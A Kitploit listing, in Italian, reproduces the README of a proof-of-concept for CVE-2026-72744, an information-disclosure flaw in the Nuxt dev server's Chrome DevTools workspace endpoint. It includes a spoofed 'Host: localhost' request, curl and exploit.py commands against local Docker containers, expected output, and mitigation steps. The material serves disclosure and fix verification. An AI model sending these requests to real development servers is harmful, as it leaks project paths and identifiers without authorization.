Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-72744-poc — Proof-of-concept exploit per CVE-2026-72744, una vulnerabilità di divulgazione di informazioni nell'endpoint workspace di Chrome DevTools del server di sviluppo Nuxt. Dimostra il difetto e verifica la correzione. | Kitploit
Strumenti/GitHubGitHub/saku0512/cve-2026-72744-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPaper e RicercaApprendimento e Formazione
GitHubsaku0512/cve-2026-72744-poc

CVE-2026-72744-poc

Proof-of-concept exploit per CVE-2026-72744, una vulnerabilità di divulgazione di informazioni nell'endpoint workspace di Chrome DevTools del server di sviluppo Nuxt. Dimostra il difetto e verifica la correzione.

Vedi Repository
11420 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-72744: Divulgazione di informazioni tramite endpoint Chrome DevTools di Nuxt - PoC

English version

Panoramica

Questo repository è una Proof of Concept (PoC) della vulnerabilità di divulgazione di informazioni CVE-2026-72744 presente nell'endpoint Chrome DevTools workspace del server di sviluppo Nuxt.

Il server di sviluppo vulnerabile determina se la connessione proviene da un'origine locale basandosi non sull'indirizzo TCP peer, ma su header HTTP come Host, che possono essere specificati dall'attaccante. Se il server di sviluppo è in ascolto su 0.0.0.0, un attaccante non autenticato sulla LAN può ottenere il percorso assoluto del progetto e un UUID workspace persistente inviando una richiesta con Host: localhost.

Questa PoC avvia Nuxt 4.5.0 (versione vulnerabile) e 4.5.1 (versione corretta) in Docker e invia la stessa richiesta dal lato host per verificare la differenza di comportamento. Non esegue letture/scritture di file né esecuzione di codice.

Dichiarazione di non responsabilità

Utilizzare esclusivamente per scopi educativi e per verifiche di sicurezza autorizzate. Non inviare richieste non autorizzate verso ambienti di terze parti.

Dettagli della vulnerabilità

  • ID CVE: CVE-2026-72744
  • Prodotto: Nuxt
  • Tipo: Divulgazione di informazioni (CWE-200)
  • Versioni interessate: >= 4.4.7, < 4.5.1 e >= 3.21.7, < 3.21.10
  • Versioni corrette: 4.5.1 / 3.21.10
  • Target: Solo server di sviluppo (la build di produzione non è interessata)
  • Prerequisiti: bind raggiungibile dalla rete e experimental.chromeDevtoolsProjectSettings abilitato per impostazione predefinita
  • Impatto: Divulgazione del percorso assoluto di rootDir e dell'UUID workspace specifico del progetto

Causa principale

Nella versione vulnerabile, isLocalDevRequest tratta una richiesta come locale se Host è nella lista consentita e non sono presenti header cross-site provenienti dal browser. Poiché i client non-browser possono omettere o specificare liberamente questi header, la seguente richiesta supera il controllo.

root@kitploit:~
GET /.well-known/appspecific/com.chrome.devtools.json HTTP/1.1
Host: localhost

La versione corretta, oltre al controllo degli header esistente, richiede che l'indirizzo TCP peer effettivo sia loopback (127.0.0.0/8 o ::1).

Proof of Concept (Utilizzo)

1. Avvio dell'ambiente

root@kitploit:~
docker compose up -d --build
URLVersioneRisultato atteso
http://localhost:3000Nuxt 4.5.0HTTP 200, divulgazione di informazioni
http://localhost:3001Nuxt 4.5.1HTTP 403

La prima build potrebbe richiedere alcuni minuti per il download dei pacchetti npm.

2. Verifica della versione vulnerabile

root@kitploit:~
python3 exploit.py -t http://localhost:3000 --expect vulnerable

Output atteso:

root@kitploit:~
[!] VULNERABLE: the endpoint disclosed workspace.root and workspace.uuid.

3. Verifica della versione corretta

root@kitploit:~
python3 exploit.py -t http://localhost:3001 --expect fixed

Output atteso:

root@kitploit:~
[+] FIXED: the non-loopback request was rejected with HTTP 403.

4. Verifica con curl

root@kitploit:~
curl -i -H 'Host: localhost' \
  http://localhost:3000/.well-known/appspecific/com.chrome.devtools.json

curl -i -H 'Host: localhost' \
  http://localhost:3001/.well-known/appspecific/com.chrome.devtools.json

Poiché la richiesta passa attraverso il port forwarding di Docker, l'origine della connessione vista dal container non è loopback. Ciò consente di riprodurre su un singolo host le condizioni equivalenti a un attacco dalla LAN.

5. Pulizia

root@kitploit:~
docker compose down -v

Criteri di valutazione del PoC

exploit.py specifica Host: localhost e accede all'endpoint target senza inviare Origin, Referer o Sec-Fetch-Site. La vulnerabilità viene rilevata solo se il JSON con HTTP 200 contiene le stringhe workspace.root e workspace.uuid. HTTP 403 è il comportamento atteso per la versione corretta.

Mitigazione

Aggiornare Nuxt alla versione 4.5.1 o successiva per la serie 4, e alla 3.21.10 o successiva per la serie 3. Se non è possibile aggiornare, bindare il server di sviluppo solo su loopback oppure impostare experimental.chromeDevtoolsProjectSettings: false.

Informazioni di riferimento

  • GitHub Security Advisory GHSA-7c4v-fwgw-9rf7
  • Nuxt 4.5.1 release
  • Fix commit
  • NVD: CVE-2026-72744
Scarica lo strumento